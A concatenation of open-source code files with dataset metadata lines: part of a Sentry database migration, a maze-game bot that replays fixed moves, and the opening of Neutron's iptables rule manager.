'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'users_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['sentry.User']"})
},
'sentry.trackeduser': {
'Meta': {'unique_together': "(('project', 'ident'),)", 'object_name': 'TrackedUser'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Group']", 'through': "orm['sentry.AffectedUserByGroup']", 'symmetrical': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'num_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 6,954,336,949,804,500,000 | 81.926056 | 181 | 0.556367 | false |
dimtion/jml | outputFiles/statistics/archives/ourIA/improved_closest_v2.py/1.0/9/player1.py | 1 | 11276 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
####################################################################################################################################################################################################################################
######################################################################################################## PRE-DEFINED IMPORTS #######################################################################################################
####################################################################################################################################################################################################################################
# Imports that are necessary for the program architecture to work properly
# Do not edit this code
import ast
import sys
import os
####################################################################################################################################################################################################################################
####################################################################################################### PRE-DEFINED CONSTANTS ######################################################################################################
####################################################################################################################################################################################################################################
# Possible characters to send to the maze application
# Any other will be ignored
# Do not edit this code
UP = 'U'
DOWN = 'D'
LEFT = 'L'
RIGHT = 'R'
####################################################################################################################################################################################################################################
# Name of your team
# It will be displayed in the maze
# You have to edit this code
TEAM_NAME = "Improved closest v2"
####################################################################################################################################################################################################################################
########################################################################################################## YOUR VARIABLES ##########################################################################################################
####################################################################################################################################################################################################################################
# Stores all the moves in a list to restitute them one by one
allMoves = [RIGHT, RIGHT, RIGHT, RIGHT, UP, UP, LEFT, UP, RIGHT, RIGHT, UP, RIGHT, UP, UP, UP, RIGHT, DOWN, RIGHT, UP, UP]
####################################################################################################################################################################################################################################
####################################################################################################### PRE-DEFINED FUNCTIONS ######################################################################################################
####################################################################################################################################################################################################################################
# Writes a message to the shell
# Use for debugging your program
# Channels stdout and stdin are captured to enable communication with the maze
# Do not edit this code
def debug (text) :
# Writes to the stderr channel
sys.stderr.write(str(text) + "\n")
sys.stderr.flush()
####################################################################################################################################################################################################################################
# Reads one line of information sent by the maze application
# This function is blocking, and will wait for a line to terminate
# The received information is automatically converted to the correct type
# Do not edit this code
def readFromPipe () :
# Reads from the stdin channel and returns the structure associated to the string
try :
text = sys.stdin.readline()
return ast.literal_eval(text.strip())
except :
os._exit(-1)
####################################################################################################################################################################################################################################
# Sends the text to the maze application
# Do not edit this code
def writeToPipe (text) :
# Writes to the stdout channel
sys.stdout.write(text)
sys.stdout.flush()
####################################################################################################################################################################################################################################
# Reads the initial maze information
# The function processes the text and returns the associated variables
# The dimensions of the maze are positive integers
# Maze map is a dictionary associating to a location its adjacent locations and the associated weights
# The preparation time gives the time during which 'initializationCode' can make computations before the game starts
# The turn time gives the time during which 'determineNextMove' can make computations before returning a decision
# Player locations are tuples (line, column)
# Coins are given as a list of locations where they appear
# A boolean indicates if the game is over
# Do not edit this code
def processInitialInformation () :
# We read from the pipe
data = readFromPipe()
return (data['mazeWidth'], data['mazeHeight'], data['mazeMap'], data['preparationTime'], data['turnTime'], data['playerLocation'], data['opponentLocation'], data['coins'], data['gameIsOver'])
####################################################################################################################################################################################################################################
# Reads the information after each player moved
# The maze map and allowed times are no longer provided since they do not change
# Do not edit this code
def processNextInformation () :
# We read from the pipe
data = readFromPipe()
return (data['playerLocation'], data['opponentLocation'], data['coins'], data['gameIsOver'])
####################################################################################################################################################################################################################################
########################################################################################################## YOUR FUNCTIONS ##########################################################################################################
####################################################################################################################################################################################################################################
# This is where you should write your code to do things during the initialization delay
# This function should not return anything, but should be used for a short preprocessing
# This function takes as parameters the dimensions and map of the maze, the time it is allowed for computing, the players locations in the maze and the remaining coins locations
# Make sure to have a safety margin for the time to include processing times (communication etc.)
def initializationCode (mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins) :
# Nothing to do
pass
####################################################################################################################################################################################################################################
# This is where you should write your code to determine the next direction
# This function should return one of the directions defined in the CONSTANTS section
# This function takes as parameters the dimensions and map of the maze, the time it is allowed for computing, the players locations in the maze and the remaining coins locations
# Make sure to have a safety margin for the time to include processing times (communication etc.)
def determineNextMove (mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins) :
# We return the next move as described by the list
global allMoves
nextMove = allMoves[0]
allMoves = allMoves[1:]
return nextMove
####################################################################################################################################################################################################################################
############################################################################################################# MAIN LOOP ############################################################################################################
####################################################################################################################################################################################################################################
# This is the entry point when executing this file
# We first send the name of the team to the maze
# The first message we receive from the maze includes its dimensions and map, the times allowed to the various steps, and the players and coins locations
# Then, at every loop iteration, we get the maze status and determine a move
# Do not edit this code
if __name__ == "__main__" :
# We send the team name
writeToPipe(TEAM_NAME + "\n")
# We process the initial information and have a delay to compute things using it
(mazeWidth, mazeHeight, mazeMap, preparationTime, turnTime, playerLocation, opponentLocation, coins, gameIsOver) = processInitialInformation()
initializationCode(mazeWidth, mazeHeight, mazeMap, preparationTime, playerLocation, opponentLocation, coins)
# We decide how to move and wait for the next step
while not gameIsOver :
(playerLocation, opponentLocation, coins, gameIsOver) = processNextInformation()
if gameIsOver :
break
nextMove = determineNextMove(mazeWidth, mazeHeight, mazeMap, turnTime, playerLocation, opponentLocation, coins)
writeToPipe(nextMove)
####################################################################################################################################################################################################################################
#################################################################################################################################################################################################################################### | mit | 2,706,744,758,109,684,000 | 64.184971 | 228 | 0.357751 | false |
swdream/neutron | neutron/agent/linux/iptables_manager.py | 17 | 28571 | # Copyright 2012 Locaweb.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# based on
# https://github.com/openstack/nova/blob/master/nova/network/linux_net.py
"""Implements iptables rules using linux utilities."""
import collections
import contextlib
import os
import re
import sys
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.agent.common import config
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import utils as linux_utils
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.i18n import _LE, _LW
LOG = logging.getLogger(__name__)
config.register_iptables_opts(cfg.CONF)
# NOTE(vish): Iptables supports chain names of up to 28 characters, and we
# add up to 12 characters to binary_name which is used as a prefix,
# so we limit it to 16 characters.
# (max_chain_name_length - len('-POSTROUTING') == 16)
def get_binary_name():
"""Grab the name of the binary we're running in."""
return os.path.basename(sys.argv[0])[:16].replace(' ', '_')
binary_name = get_binary_name()
# A length of a chain name must be less than or equal to 11 characters.
# <max length of iptables chain name> - (<binary_name> + '-') = 28-(16+1) = 11
MAX_CHAIN_LEN_WRAP = 11
MAX_CHAIN_LEN_NOWRAP = 28
# Number of iptables rules to print before and after a rule that causes a
# a failure during iptables-restore
IPTABLES_ERROR_LINES_OF_CONTEXT = 5
def comment_rule(rule, comment):
if not cfg.CONF.AGENT.comment_iptables_rules or not comment:
return rule
# iptables-save outputs the comment before the jump so we need to match
# that order so _find_last_entry works
try:
start_of_jump = rule.index(' -j ')
except ValueError:
return '%s -m comment --comment "%s"' % (rule, comment)
return ' '.join([rule[0:start_of_jump],
'-m comment --comment "%s"' % comment,
rule[start_of_jump + 1:]])
def get_chain_name(chain_name, wrap=True):
if wrap:
return chain_name[:MAX_CHAIN_LEN_WRAP]
else:
return chain_name[:MAX_CHAIN_LEN_NOWRAP]
class IptablesRule(object):
"""An iptables rule.
You shouldn't need to use this class directly, it's only used by
IptablesManager.
"""
def __init__(self, chain, rule, wrap=True, top=False,
binary_name=binary_name, tag=None, comment=None):
self.chain = get_chain_name(chain, wrap)
self.rule = rule
self.wrap = wrap
self.top = top
self.wrap_name = binary_name[:16]
self.tag = tag
self.comment = comment
def __eq__(self, other):
return ((self.chain == other.chain) and
(self.rule == other.rule) and
(self.top == other.top) and
(self.wrap == other.wrap))
def __ne__(self, other):
return not self == other
def __str__(self):
if self.wrap:
chain = '%s-%s' % (self.wrap_name, self.chain)
else:
chain = self.chain
return comment_rule('-A %s %s' % (chain, self.rule), self.comment)
class IptablesTable(object):
"""An iptables table."""
def __init__(self, binary_name=binary_name):
self.rules = []
self.remove_rules = []
self.chains = set()
self.unwrapped_chains = set()
self.remove_chains = set()
self.wrap_name = binary_name[:16]
def add_chain(self, name, wrap=True):
"""Adds a named chain to the table.
The chain name is wrapped to be unique for the component creating
it, so different components of Nova can safely create identically
named chains without interfering with one another.
At the moment, its wrapped name is <binary name>-<chain name>,
so if neutron-openvswitch-agent creates a chain named 'OUTPUT',
it'll actually end up being named 'neutron-openvswi-OUTPUT'.
"""
name = get_chain_name(name, wrap)
if wrap:
self.chains.add(name)
else:
self.unwrapped_chains.add(name)
def _select_chain_set(self, wrap):
if wrap:
return self.chains
else:
return self.unwrapped_chains
def remove_chain(self, name, wrap=True):
"""Remove named chain.
This removal "cascades". All rule in the chain are removed, as are
all rules in other chains that jump to it.
If the chain is not found, this is merely logged.
"""
name = get_chain_name(name, wrap)
chain_set = self._select_chain_set(wrap)
if name not in chain_set:
LOG.debug('Attempted to remove chain %s which does not exist',
name)
return
chain_set.remove(name)
if not wrap:
# non-wrapped chains and rules need to be dealt with specially,
# so we keep a list of them to be iterated over in apply()
self.remove_chains.add(name)
# first, add rules to remove that have a matching chain name
self.remove_rules += [r for r in self.rules if r.chain == name]
# next, remove rules from list that have a matching chain name
self.rules = [r for r in self.rules if r.chain != name]
if not wrap:
jump_snippet = '-j %s' % name
# next, add rules to remove that have a matching jump chain
self.remove_rules += [r for r in self.rules
if jump_snippet in r.rule]
else:
jump_snippet = '-j %s-%s' % (self.wrap_name, name)
# finally, remove rules from list that have a matching jump chain
self.rules = [r for r in self.rules
if jump_snippet not in r.rule]
def add_rule(self, chain, rule, wrap=True, top=False, tag=None,
comment=None):
"""Add a rule to the table.
This is just like what you'd feed to iptables, just without
the '-A <chain name>' bit at the start.
However, if you need to jump to one of your wrapped chains,
prepend its name with a '$' which will ensure the wrapping
is applied correctly.
"""
chain = get_chain_name(chain, wrap)
if wrap and chain not in self.chains:
raise LookupError(_('Unknown chain: %r') % chain)
if '$' in rule:
rule = ' '.join(
self._wrap_target_chain(e, wrap) for e in rule.split(' '))
self.rules.append(IptablesRule(chain, rule, wrap, top, self.wrap_name,
tag, comment))
def _wrap_target_chain(self, s, wrap):
if s.startswith('$'):
s = ('%s-%s' % (self.wrap_name, get_chain_name(s[1:], wrap)))
return s
def remove_rule(self, chain, rule, wrap=True, top=False, comment=None):
"""Remove a rule from a chain.
Note: The rule must be exactly identical to the one that was added.
You cannot switch arguments around like you can with the iptables
CLI tool.
"""
chain = get_chain_name(chain, wrap)
try:
if '$' in rule:
rule = ' '.join(
self._wrap_target_chain(e, wrap) for e in rule.split(' '))
self.rules.remove(IptablesRule(chain, rule, wrap, top,
self.wrap_name,
comment=comment))
if not wrap:
self.remove_rules.append(IptablesRule(chain, rule, wrap, top,
self.wrap_name,
comment=comment))
except ValueError:
LOG.warn(_LW('Tried to remove rule that was not there:'
' %(chain)r %(rule)r %(wrap)r %(top)r'),
{'chain': chain, 'rule': rule,
'top': top, 'wrap': wrap})
def _get_chain_rules(self, chain, wrap):
chain = get_chain_name(chain, wrap)
return [rule for rule in self.rules
if rule.chain == chain and rule.wrap == wrap]
def empty_chain(self, chain, wrap=True):
"""Remove all rules from a chain."""
chained_rules = self._get_chain_rules(chain, wrap)
for rule in chained_rules:
self.rules.remove(rule)
def clear_rules_by_tag(self, tag):
if not tag:
return
rules = [rule for rule in self.rules if rule.tag == tag]
for rule in rules:
self.rules.remove(rule)
class IptablesManager(object):
"""Wrapper for iptables.
See IptablesTable for some usage docs
A number of chains are set up to begin with.
First, neutron-filter-top. It's added at the top of FORWARD and OUTPUT.
Its name is not wrapped, so it's shared between the various neutron
workers. It's intended for rules that need to live at the top of the
FORWARD and OUTPUT chains. It's in both the ipv4 and ipv6 set of tables.
For ipv4 and ipv6, the built-in INPUT, OUTPUT, and FORWARD filter chains
are wrapped, meaning that the "real" INPUT chain has a rule that jumps to
the wrapped INPUT chain, etc. Additionally, there's a wrapped chain named
"local" which is jumped to from neutron-filter-top.
For ipv4, the built-in PREROUTING, OUTPUT, and POSTROUTING nat chains are
wrapped in the same was as the built-in filter chains. Additionally,
there's a snat chain that is applied after the POSTROUTING chain.
"""
def __init__(self, _execute=None, state_less=False, use_ipv6=False,
namespace=None, binary_name=binary_name):
if _execute:
self.execute = _execute
else:
self.execute = linux_utils.execute
self.use_ipv6 = use_ipv6
self.namespace = namespace
self.iptables_apply_deferred = False
self.wrap_name = binary_name[:16]
self.ipv4 = {'filter': IptablesTable(binary_name=self.wrap_name)}
self.ipv6 = {'filter': IptablesTable(binary_name=self.wrap_name)}
# Add a neutron-filter-top chain. It's intended to be shared
# among the various neutron components. It sits at the very top
# of FORWARD and OUTPUT.
for tables in [self.ipv4, self.ipv6]:
tables['filter'].add_chain('neutron-filter-top', wrap=False)
tables['filter'].add_rule('FORWARD', '-j neutron-filter-top',
wrap=False, top=True)
tables['filter'].add_rule('OUTPUT', '-j neutron-filter-top',
wrap=False, top=True)
tables['filter'].add_chain('local')
tables['filter'].add_rule('neutron-filter-top', '-j $local',
wrap=False)
# Wrap the built-in chains
builtin_chains = {4: {'filter': ['INPUT', 'OUTPUT', 'FORWARD']},
6: {'filter': ['INPUT', 'OUTPUT', 'FORWARD']}}
if not state_less:
self.ipv4.update(
{'mangle': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update(
{'mangle': ['PREROUTING', 'INPUT', 'FORWARD', 'OUTPUT',
'POSTROUTING']})
self.ipv4.update(
{'nat': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update({'nat': ['PREROUTING',
'OUTPUT', 'POSTROUTING']})
self.ipv4.update({'raw': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[4].update({'raw': ['PREROUTING', 'OUTPUT']})
self.ipv6.update({'raw': IptablesTable(binary_name=self.wrap_name)})
builtin_chains[6].update({'raw': ['PREROUTING', 'OUTPUT']})
for ip_version in builtin_chains:
if ip_version == 4:
tables = self.ipv4
elif ip_version == 6:
tables = self.ipv6
for table, chains in six.iteritems(builtin_chains[ip_version]):
for chain in chains:
tables[table].add_chain(chain)
tables[table].add_rule(chain, '-j $%s' %
(chain), wrap=False)
if not state_less:
# Add a neutron-postrouting-bottom chain. It's intended to be
# shared among the various neutron components. We set it as the
# last chain of POSTROUTING chain.
self.ipv4['nat'].add_chain('neutron-postrouting-bottom',
wrap=False)
self.ipv4['nat'].add_rule('POSTROUTING',
'-j neutron-postrouting-bottom',
wrap=False)
# We add a snat chain to the shared neutron-postrouting-bottom
# chain so that it's applied last.
self.ipv4['nat'].add_chain('snat')
self.ipv4['nat'].add_rule('neutron-postrouting-bottom',
'-j $snat', wrap=False,
comment=ic.SNAT_OUT)
# And then we add a float-snat chain and jump to first thing in
# the snat chain.
self.ipv4['nat'].add_chain('float-snat')
self.ipv4['nat'].add_rule('snat', '-j $float-snat')
# Add a mark chain to mangle PREROUTING chain. It is used to
# identify ingress packets from a certain interface.
self.ipv4['mangle'].add_chain('mark')
self.ipv4['mangle'].add_rule('PREROUTING', '-j $mark')
def get_chain(self, table, chain, ip_version=4, wrap=True):
try:
requested_table = {4: self.ipv4, 6: self.ipv6}[ip_version][table]
except KeyError:
return []
return requested_table._get_chain_rules(chain, wrap)
def is_chain_empty(self, table, chain, ip_version=4, wrap=True):
return not self.get_chain(table, chain, ip_version, wrap)
@contextlib.contextmanager
def defer_apply(self):
"""Defer apply context."""
self.defer_apply_on()
try:
yield
finally:
try:
self.defer_apply_off()
except Exception:
msg = _LE('Failure applying iptables rules')
LOG.exception(msg)
raise n_exc.IpTablesApplyException(msg)
def defer_apply_on(self):
self.iptables_apply_deferred = True
def defer_apply_off(self):
self.iptables_apply_deferred = False
self._apply()
def apply(self):
if self.iptables_apply_deferred:
return
self._apply()
def _apply(self):
lock_name = 'iptables'
if self.namespace:
lock_name += '-' + self.namespace
with lockutils.lock(lock_name, utils.SYNCHRONIZED_PREFIX, True):
return self._apply_synchronized()
def get_rules_for_table(self, table):
"""Runs iptables-save on a table and returns the results."""
args = ['iptables-save', '-t', table]
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
return self.execute(args, run_as_root=True).split('\n')
def _apply_synchronized(self):
"""Apply the current in-memory set of iptables rules.
This will blow away any rules left over from previous runs of the
same component of Nova, and replace them with our current set of
rules. This happens atomically, thanks to iptables-restore.
"""
s = [('iptables', self.ipv4)]
if self.use_ipv6:
s += [('ip6tables', self.ipv6)]
for cmd, tables in s:
args = ['%s-save' % (cmd,), '-c']
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
all_tables = self.execute(args, run_as_root=True)
all_lines = all_tables.split('\n')
# Traverse tables in sorted order for predictable dump output
for table_name in sorted(tables):
table = tables[table_name]
start, end = self._find_table(all_lines, table_name)
all_lines[start:end] = self._modify_rules(
all_lines[start:end], table, table_name)
args = ['%s-restore' % (cmd,), '-c']
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
try:
self.execute(args, process_input='\n'.join(all_lines),
run_as_root=True)
except RuntimeError as r_error:
